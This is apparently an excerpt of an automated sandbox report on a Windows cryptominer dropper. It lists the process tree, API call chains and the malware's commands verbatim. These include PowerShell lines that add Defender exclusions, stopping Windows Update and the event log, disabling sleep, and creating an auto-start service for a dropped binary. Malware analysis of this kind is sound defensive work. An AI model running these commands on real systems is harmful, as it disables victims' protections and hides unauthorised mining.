Source: powershell.exe, 00000002.00000002.1469378099.0000000005031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1469378099.0000000005185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

System Summary

barindex
Uses powercfg.exe to modify the power settings
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,45_2_00000001400010C0
Source: C:\Windows\System32\dialer.exeCode function: 52_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,52_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E9917528C8 NtEnumerateValueKey,NtEnumerateValueKey,59_2_000002E9917528C8
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,73_2_00000213BDCE253C
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCE202C NtQuerySystemInformation,StrCmpNIW,73_2_00000213BDCE202C
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB16728C8 NtEnumerateValueKey,NtEnumerateValueKey,75_2_0000026DB16728C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F1B5802_2_04F1B580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04F1B5702_2_04F1B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08BC3A982_2_08BC3A98
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF6D0E010_2_000002534CF6D0E0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF738A810_2_000002534CF738A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF61F2C10_2_000002534CF61F2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF9DCE010_2_000002534CF9DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CFA44A810_2_000002534CFA44A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 10_2_000002534CF92B2C10_2_000002534CF92B2C
Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000226C45_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001400014D845_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000256045_2_0000000140002560
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000226C52_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 52_2_00000001400014D852_2_00000001400014D8
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000256052_2_0000000140002560
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991721F2C59_2_000002E991721F2C
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99172D0E059_2_000002E99172D0E0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E9917338A859_2_000002E9917338A8
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E991752B2C59_2_000002E991752B2C
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E99175DCE059_2_000002E99175DCE0
Source: C:\Windows\System32\winlogon.exeCode function: 59_2_000002E9917644A859_2_000002E9917644A8
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCBD0E073_2_00000213BDCBD0E0
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCC38A873_2_00000213BDCC38A8
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCB1F2C73_2_00000213BDCB1F2C
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCEDCE073_2_00000213BDCEDCE0
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCF44A873_2_00000213BDCF44A8
Source: C:\Windows\System32\lsass.exeCode function: 73_2_00000213BDCE2B2C73_2_00000213BDCE2B2C
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709A1F2C74_2_00000158709A1F2C
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709AD0E074_2_00000158709AD0E0
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709B38A874_2_00000158709B38A8
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709D2B2C74_2_00000158709D2B2C
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709DDCE074_2_00000158709DDCE0
Source: C:\Windows\System32\svchost.exeCode function: 74_2_00000158709E44A874_2_00000158709E44A8
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB15BD0E075_2_0000026DB15BD0E0
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB15C38A875_2_0000026DB15C38A8
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB15B1F2C75_2_0000026DB15B1F2C
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB167DCE075_2_0000026DB167DCE0
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB16844A875_2_0000026DB16844A8
Source: C:\Windows\System32\dwm.exeCode function: 75_2_0000026DB1672B2C75_2_0000026DB1672B2C
Source: Joe Sandbox ViewDropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Kawpow new.exe 4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmr new.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
Source: kx new.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engineClassification label: mal100.spyw.evad.winEXE@108/17@0/0
Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,45_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 52_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,Sleep,52_2_000000014000226C
Source: C:\Windows\System32\dialer.exeCode function: 45_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,45_2_00000001400019C4
Source: C:\Windows\System32\dialer.exeCode function: 45_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,45_2_000000014000226C
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1736:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
Source: C:\Users\user\Desktop\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\Kawpow new.exeJump to behavior
Source: kx new.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\kx new.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\kx new.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: kx new.exeReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\kx new.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_0-82
Source: unknownProcess created: C:\Users\user\Desktop\kx new.exe "C:\Users\user\Desktop\kx new.exe"
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" Jump to behavior
Source: C:\Users\user\Desktop\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
